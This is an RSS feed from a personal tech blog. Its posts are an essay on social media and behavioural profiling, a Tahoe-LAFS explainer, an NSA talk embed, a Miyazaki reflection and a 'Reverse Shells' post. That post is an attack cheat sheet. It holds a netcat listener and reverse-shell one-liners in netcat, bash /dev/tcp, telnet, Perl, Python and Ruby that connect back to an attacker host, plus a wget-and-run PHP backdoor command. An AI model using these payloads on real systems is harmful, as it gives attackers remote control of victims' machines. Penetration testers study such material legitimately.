<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>puppycodes</title>
    <description>puppycodes</description>
    <link>https://puppy.codes/</link>
    <atom:link href="https://puppy.codes/feed/" rel="self" type="application/rss+xml"/>
    <pubDate>Sun, 22 Sep 2024 14:35:04 +0000</pubDate>
    <lastBuildDate>Sun, 22 Sep 2024 14:35:04 +0000</lastBuildDate>
    <generator>Jekyll v3.10.0</generator>
    
      <item>
        <title>Wokeness &amp; Machines</title>
        <description>&lt;p&gt;I spend all day on the internet. I don’t do great in big groups of people. I’ve always felt more free online to communicate, express myself and try to solve problems through technology. As a trans woman there are a lot of daily obstacles that don’t exist online. You can be free of your body, immune to physical violence, and shielded from the societal judgement that comes with being visibly queer. It seems these factors drive many people to form important bonds via digital platforms. These communities develop a specific language representative of their collective values and experiences, making it easy to identify an outsider. This creates a system of trust that corporations and profit seeking entities have learned to take advantage of.&lt;/p&gt;

&lt;p&gt;Machines are starting to catalogue and learn about this language in order to identify groups and ultimately modify their behavior. Behavior modification comes in many forms these days. Most of it is driven by advertising as the predominate business model for “free” services. The goal for these companies is to train you and you and your group well enough that you will generate profit or a favorable outcome. Training a human can be just as primal and simple as an animal. Give them rewards and they will associate what they did with positive feedback. Take the reward away or cause them pain and it teaches them not to do that. The real trick is making them think they are in control.&lt;/p&gt;

&lt;p&gt;Once a group becomes aware of an intent to persuade, it’s more difficult to manipulate them. This is why social media is so perfect for this kind of experiment, because the people you interact with are already a trusted source. They can be your friends, family, or idols. All the machine has to do is present this trusted content to you in a context that might influence you. It may encourage you to invest further in the platform itself or purchase a product that another member may have “liked”.&lt;/p&gt;

&lt;p&gt;This might seem relatively innocuous until you consider the implications in other contexts. I haven’t stopped thinking about a fantastic example from sociologist Zeynep Tufekci. She questions the ethics regarding algorithms that study a certain group of people more likely to buy things at a certain time of the year. The catch is that this group of people happen to be bipolar and in the midst of a manic episode. This happens without human interaction or oversight. This company then profits directly from the pain suffered by many neurodivergent people.&lt;/p&gt;

&lt;p&gt;Another example of lack of oversight and perspective was reported by the New York Times this year. The article was about Microsoft’s facial recognition software and its inaccuracy in detecting people of color. This is clearly because the application was built by and tested by predominately white males. The bias is baked into the software. It’s a clear example of small our perspective can be when we set out to automate the world. Our digital communities often suffer from an endless echo chamber, because we seek a feeling of belonging and validation.&lt;/p&gt;

&lt;p&gt;Xenophobia is one of the side effects of online groups. This can manifest as a protective instinct, attempting to maintain a “safe space” and consistent culture. One of the simplest ways to assert your standing within the community is to call out possible outsiders in order to re-affirm collective values. I think this is a factor in why outrage comes so naturally online. In my case, almost all social media interaction happens via Instagram. My experience has been that the comments section is most often used for sharing the content with another user or attempting to further contextualize the post. This is where users identify themselves to the public through “value signaling”. An example might be calling someone out for using an outdated or insensitive term. One I see online quite often is the use of the word “retard”. It’s quite an ugly phrase in my opinion. I’ve rarely seen an individual step back and say, “yes I was wrong I apologize”. This entire confrontation meanwhile is taking place in the comments section on a single post. A place thats highly ephemeral and hidden beneath layers and layers of content. It’s no place to change anyones mind, but its where many of us do a significant amount of social interaction.&lt;/p&gt;

&lt;p&gt;In addition to that you have a system of likes for popular reactions or rebuttals. I see this as a sort of gamified wokeness. The format of the medium turns real concerns and ideas into a points system. It means that certain types of responses are ineffective, complexity is a weakness, and reactionary statements are truth. The binary system of either “like or not” presents serious issues in context for dealing with complex and intersectional problems like gender expression, race politics, and wealth inequity to name a few. This is the perfect environment for machines to exploit our deepest issues for profit.&lt;/p&gt;

&lt;p&gt;Wokeness describes something. It’s not an action, like for instance “organizing”. To me it means that you are seeing clearly and others are not. You are in an insider and others are outsiders. Ironically this idea of otherness is exactly what the social platform wants to encourage, because it means you can be categorized and persuaded in quantifiable ways. The goal is to analyze, optimize, convert, repeat.&lt;/p&gt;

&lt;p&gt;So how do we change this or at least rise above it? Jaron Lanier, an American computer scientist and writer, gave a fantastic Ted Talk in April on this subject. He stated that the business model of behavior modification was a mistake and it needs to change. As an alternative he sites the example of Netflix, a successful subscription service that changed the way companies thought about “free” online platforms. It was a gamble to bet that consumers were willing to pay a monthly fee, but ultimately they proved to be successful. He stated that “Sometimes when you pay for something it get’s better”. I mostly agree with his statement but I don’t feel that Netflix is really the golden standard we should be holding ourselves too.&lt;/p&gt;

&lt;p&gt;I was hoping he would mention how decentralized platforms could play a role in solving this problem. In theory a decentralized social platform would have no CEO asserting their subtle will, or experimenting with your attention. It would not be subject to deciding whether its ok it show a “female nipple” to the general public. It wouldn’t encourage fear of non normative bodies. It’s not a panacea however, as there are always tradeoffs.&lt;/p&gt;

&lt;p&gt;There are some self driven communities that are toxic and bad for the world. Some examples are hate speech, fascism and sexual exploitation. I think we need a better understanding of these communities think to truly mitigate their effects. The act of silencing them doesn’t allow us to properly understand how one might be tempted to join in. It’s possible that the world is better off censoring them and isolating people who think that way. I have a hunch however this drives the group to be more radical and xenophobic. It quickly becomes us vs. them. We are obsessed this type of binary thinking. Good versus evil is one of the oldest forms of divisive otherness. The truth is the world is much more complicated than that.&lt;/p&gt;

&lt;p&gt;It seems to be in our nature as humans to seek togetherness. In my own experience, to deny someone that basic instinct can make them lose perspective. One important point to consider is that social media hasn’t been around long enough to gather definitive evidence about it’s long term effects. I believe its better to have a free and open internet. Despite the potential for harmful content and horrid things humans are capable of, in my opinion, its better than a capitalist mind experiment. An experiment which is designed to confuse our ability to make informed decisions and undermine the beautiful complexity of our identities.&lt;/p&gt;

&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;🌱 Alice&lt;/p&gt;

&lt;p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;Written for &lt;a href=&quot;https://real-review.org/product/real-review-7/&quot;&gt;Real Review&lt;/a&gt; #7&lt;/p&gt;
</description>
        <pubDate>Sat, 17 Feb 2018 00:00:00 +0000</pubDate>
        <link>https://puppy.codes/2018/02/17/wokeness-&-machines.html</link>
        <guid isPermaLink="true">https://puppy.codes/2018/02/17/wokeness-&-machines.html</guid>
        
        <category>wokeness</category>
        
        <category>AI</category>
        
        <category>Data</category>
        
        
      </item>
    
      <item>
        <title>Googleing for fun and profit</title>
        <description>&lt;p&gt;some google-able terms that are worth checking out…&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;/assets/files/google.txt&quot;&gt;google.txt&lt;/a&gt;&lt;/p&gt;
</description>
        <pubDate>Sat, 17 Feb 2018 00:00:00 +0000</pubDate>
        <link>https://puppy.codes/2018/02/17/googleing-for-fun-and-profit.html</link>
        <guid isPermaLink="true">https://puppy.codes/2018/02/17/googleing-for-fun-and-profit.html</guid>
        
        <category>Google</category>
        
        <category>OSINT</category>
        
        <category>Vulnerability</category>
        
        
      </item>
    
      <item>
        <title>How the NSA tracks you</title>
        <description>&lt;p&gt;This year at the &lt;a href=&quot;https://sha2017.org/&quot;&gt;SHA 2017&lt;/a&gt; conference Bill Binney gave a pretty crazy talk on how the NSA tracks the entire world including Americans. Aside from the historic political turmoil at the moment, I hope this doesn’t distract us from how badly we need to address this.&lt;/p&gt;

&lt;style&gt;.embed-container { position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden; max-width: 100%; } .embed-container iframe, .embed-container object, .embed-container embed { position: absolute; top: 0; left: 0; width: 100%; height: 100%; }&lt;/style&gt;
&lt;div class=&quot;embed-container&quot;&gt;&lt;iframe src=&quot;https://www.youtube.com/embed/P1JDqNKMaus&quot; frameborder=&quot;0&quot; allowfullscreen=&quot;&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;
</description>
        <pubDate>Thu, 17 Aug 2017 00:00:00 +0000</pubDate>
        <link>https://puppy.codes/2017/08/17/how-the-nsa-tracks-you.html</link>
        <guid isPermaLink="true">https://puppy.codes/2017/08/17/how-the-nsa-tracks-you.html</guid>
        
        <category>NSA</category>
        
        <category>privacy</category>
        
        <category>government</category>
        
        <category>surveillance</category>
        
        
      </item>
    
      <item>
        <title>Tahoe-LAFS, The Horcrux of Secure Storage</title>
        <description>&lt;p&gt;&lt;a href=&quot;https://tahoe-lafs.org/&quot;&gt;Tahoe-LAFS&lt;/a&gt; is a secure and decentralized system for data storage and backups. Tahoe lends itself to a more developer focused community but it can be installed and used by anyone with the help of the new graphical interface called &lt;a href=&quot;https://github.com/gridsync/gridsync&quot;&gt;Gridsync&lt;/a&gt; created by Christopher R. Wood and sponsored by &lt;a href=&quot;https://leastauthority.com/&quot;&gt;Least Authority&lt;/a&gt; &amp;amp; &lt;a href=&quot;https://usable.tools/uxfund.html&quot;&gt;UX Fund&lt;/a&gt;.&lt;/p&gt;

&lt;h5 id=&quot;how-does-it-work&quot;&gt;How does it work?&lt;/h5&gt;

&lt;p&gt;Tahoe LAFS stores a file by creating an encrypted copy of the data and splitting it into multiple pieces distributed across many servers. This concept is remarkably similar to a Horcrux from Harry Potter.&lt;/p&gt;

&lt;h5 id=&quot;horcrux&quot;&gt;Horcrux&lt;/h5&gt;

&lt;p&gt;&lt;em&gt;A Horcrux is an object in which a Dark wizard or witch has hidden a fragment of his or her soul for the purpose of attaining immortality.[1] Horcruxes can only be created after committing murder, the supreme act of evil.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Luckily! We don’t have to murder anyone 😅 to leverage this concept. Using the Horcrux as an example I will attempt to explain how Tahoe works…&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/horcrux.jpg&quot; alt=&quot;horcrux&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/voldemort.png&quot; alt=&quot;horcrux&quot; /&gt;&lt;/p&gt;

&lt;h5 id=&quot;so-what-just-happened&quot;&gt;So what just happened?&lt;/h5&gt;

&lt;p&gt;First we start with Voldemorts soul… aka: the data you want to backup. Next we encrypt the data and smash it into a little bits. The encrypted pieces of data are then distributed across multiple servers or in our example several horcrux 🤓… To get the data back.. we re-glue the pieces back together using decryption keys, and now we are looking at your backup!&lt;/p&gt;

&lt;h5 id=&quot;provider-independent-security&quot;&gt;Provider-independent security&lt;/h5&gt;

&lt;p&gt;Why is this good or better than traditional methods? It’s important to ask if you want your to be in control of your data. When security and/or storage is handled by a large corporation… sometimes that corporation can be influenced by government pressure or monetary interests and that might not pan out well depending what your goals are. Every time you quickly click through that lil privacy agreement theres a possibility they changed something. Wouldn’t it be nicer if you didn’t have to read it at all?
Here’s the more technical graph from Tahoe-LAFS:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/technical-tahoe.jpg&quot; alt=&quot;horcrux&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Only the individual with the original link otherwise known as FURL, will be able to access the data. This means that there is no possibility of a government or third party being able to access your data without the link!&lt;/p&gt;

&lt;p&gt;Version 0.1 of Gridsync was just released today and I will be testing it out soon!&lt;/p&gt;
</description>
        <pubDate>Tue, 16 May 2017 00:00:00 +0000</pubDate>
        <link>https://puppy.codes/2017/05/16/tahoe-lafs-the-horcrux-of-secure-storage.html</link>
        <guid isPermaLink="true">https://puppy.codes/2017/05/16/tahoe-lafs-the-horcrux-of-secure-storage.html</guid>
        
        <category>storage</category>
        
        <category>crypto</category>
        
        <category>horcrux</category>
        
        <category>decentralized</category>
        
        
      </item>
    
      <item>
        <title>Reverse Shells</title>
        <description>&lt;p&gt;Reverse shells can be used to execute commands or collect data from another computer. The concept is that the attacker opens a listening port on which the victim (through some exploit) connects to the attacker over tcp. This configuration also works vice versa which is known as a bind shell.&lt;/p&gt;

&lt;p&gt;It’s important to consider what software the victim might have on their machine to enable this connection, thus using built in tools can be a smart approach.&lt;/p&gt;

&lt;h5 id=&quot;heres-how-you-start-the-listener-to-connect-to-the-vicitm-using-netcat&quot;&gt;Here’s how you start the listener to connect to the vicitm (using netcat):&lt;/h5&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;attacker$ nc -l -v attackerip 4444
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h5 id=&quot;netcat&quot;&gt;Netcat&lt;/h5&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;nc &amp;lt;attacker_ip&amp;gt; &amp;lt;port&amp;gt; -e /bin/bash
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h5 id=&quot;no--e-flag-use-the-gapingsecurityhole-technique&quot;&gt;no -e flag? use the GAPING_SECURITY_HOLE technique&lt;/h5&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;mknod backpipe p; nc &amp;lt;attacker_ip&amp;gt; &amp;lt;port&amp;gt; 0&amp;lt;backpipe | /bin/bash 1&amp;gt;backpipe
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h5 id=&quot;devtcp&quot;&gt;/dev/tcp&lt;/h5&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;/bin/bash -i &amp;gt; /dev/tcp/&amp;lt;attacker_ip&amp;gt;/&amp;lt;port&amp;gt; 0&amp;lt;&amp;amp;1 2&amp;gt;&amp;amp;1
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h5 id=&quot;telnet---gapingsecurityhole&quot;&gt;Telnet - GAPING_SECURITY_HOLE&lt;/h5&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;mknod backpipe p; telnet &amp;lt;attacker_ip&amp;gt; &amp;lt;port&amp;gt; 0&amp;lt;backpipe | /bin/bash 1&amp;gt;backpipe
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h5 id=&quot;php&quot;&gt;PHP&lt;/h5&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;wget -O /tmp/bd.php &amp;lt;url_to_malicious_file&amp;gt; &amp;amp;&amp;amp; php -f /tmp/bd.php
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h5 id=&quot;bash&quot;&gt;Bash&lt;/h5&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;bash -i &amp;gt;&amp;amp; /dev/tcp/10.0.0.1/8080 0&amp;gt;&amp;amp;10&amp;lt;&amp;amp;196;exec 196&amp;lt;&amp;gt;/dev/tcp/attackerip/4444;

sh &amp;lt;&amp;amp;196 &amp;gt;&amp;amp;196 2&amp;gt;&amp;amp;196

exec 5&amp;lt;&amp;gt;/dev/tcp/attackerip/4444

cat &amp;lt;&amp;amp;5 | while read line; do $line 2&amp;gt;&amp;amp;5 &amp;gt;&amp;amp;5; done  # or:

while read line 0&amp;lt;&amp;amp;5; do $line 2&amp;gt;&amp;amp;5 &amp;gt;&amp;amp;5; done
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h5 id=&quot;perl&quot;&gt;PERL&lt;/h5&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;perl -MIO::Socket -e &apos;$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr =&amp;gt; &quot;127.0.0.1:1234&quot;);STDIN-&amp;gt;fdopen($c,r);$~-&amp;gt;fdopen($c,w);system$_ while&amp;lt;&amp;gt;;&apos;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h5 id=&quot;python&quot;&gt;Python&lt;/h5&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;python -c &apos;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.0.0.1&quot;,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);&apos;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h5 id=&quot;ruby&quot;&gt;Ruby&lt;/h5&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;ruby -rsocket -e &apos;exit if fork;c=TCPSocket.new(&quot;attackerip&quot;,&quot;4444&quot;);while(cmd=c.gets);IO.popen(cmd,&quot;r&quot;){|io|c.print io.read}end&apos;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h5 id=&quot;further-reading&quot;&gt;Further Reading&lt;/h5&gt;

&lt;p&gt;&lt;a href=&quot;http://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html&quot;&gt;http://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem&quot;&gt;https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem&lt;/a&gt;&lt;/p&gt;

</description>
        <pubDate>Tue, 27 Dec 2016 00:00:00 +0000</pubDate>
        <link>https://puppy.codes/2016/12/27/reverse-shells.html</link>
        <guid isPermaLink="true">https://puppy.codes/2016/12/27/reverse-shells.html</guid>
        
        <category>Security</category>
        
        <category>Offense</category>
        
        <category>Reverse-Shell</category>
        
        
      </item>
    
      <item>
        <title>Hayao Miyazaki and Virtual Sympathy</title>
        <description>&lt;style&gt;.embed-container { position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden; max-width: 100%; } .embed-container iframe, .embed-container object, .embed-container embed { position: absolute; top: 0; left: 0; width: 100%; height: 100%; }&lt;/style&gt;
&lt;div class=&quot;embed-container&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/197062166&quot; frameborder=&quot;0&quot; webkitallowfullscreen=&quot;&quot; mozallowfullscreen=&quot;&quot; allowfullscreen=&quot;&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;

&lt;p&gt;A few weeks ago I came across a video of Miyazaki responding to an AI demonstration floating around the net. The presentation lead by the CGI team from the &lt;a href=&quot;http://ailab.dwango.co.jp/en/&quot;&gt;Dwango Artificial Intelligence Laboratory&lt;/a&gt; displayed a disfigured zombie like creature crawling across the floor.&lt;/p&gt;

&lt;p&gt;I really enjoyed his response. Miasaki often creates a deeply empathetic connection between the characters and the viewer. The methods used to relate are similar to those used in non-digital living. Food is a great example.&lt;/p&gt;

&lt;p&gt;One of the moments where I have felt most connected was watching Chihiro from &lt;a href=&quot;https://en.wikipedia.org/wiki/Spirited_Away&quot;&gt;Spirited Away&lt;/a&gt; contemplatively eating this incredible looking steamed bun. I could almost taste it! It lead me to absorb the scene so fully that I remember it more as a place than a thing I was watching.&lt;/p&gt;

&lt;p&gt;The Dwango presentation took me away from place all together. The technology might be interesting it presents no relationship to the care that connects us to the cold screen. It’s almost as if it highlights the viewing device itself rather than allowing it to disappear.&lt;/p&gt;

</description>
        <pubDate>Tue, 20 Dec 2016 00:00:00 +0000</pubDate>
        <link>https://puppy.codes/2016/12/20/hayao-miyazaki-and-virtual-sympathy.html</link>
        <guid isPermaLink="true">https://puppy.codes/2016/12/20/hayao-miyazaki-and-virtual-sympathy.html</guid>
        
        <category>AI</category>
        
        <category>Psychology</category>
        
        <category>Games</category>
        
        
      </item>
    
  </channel>
</rss>
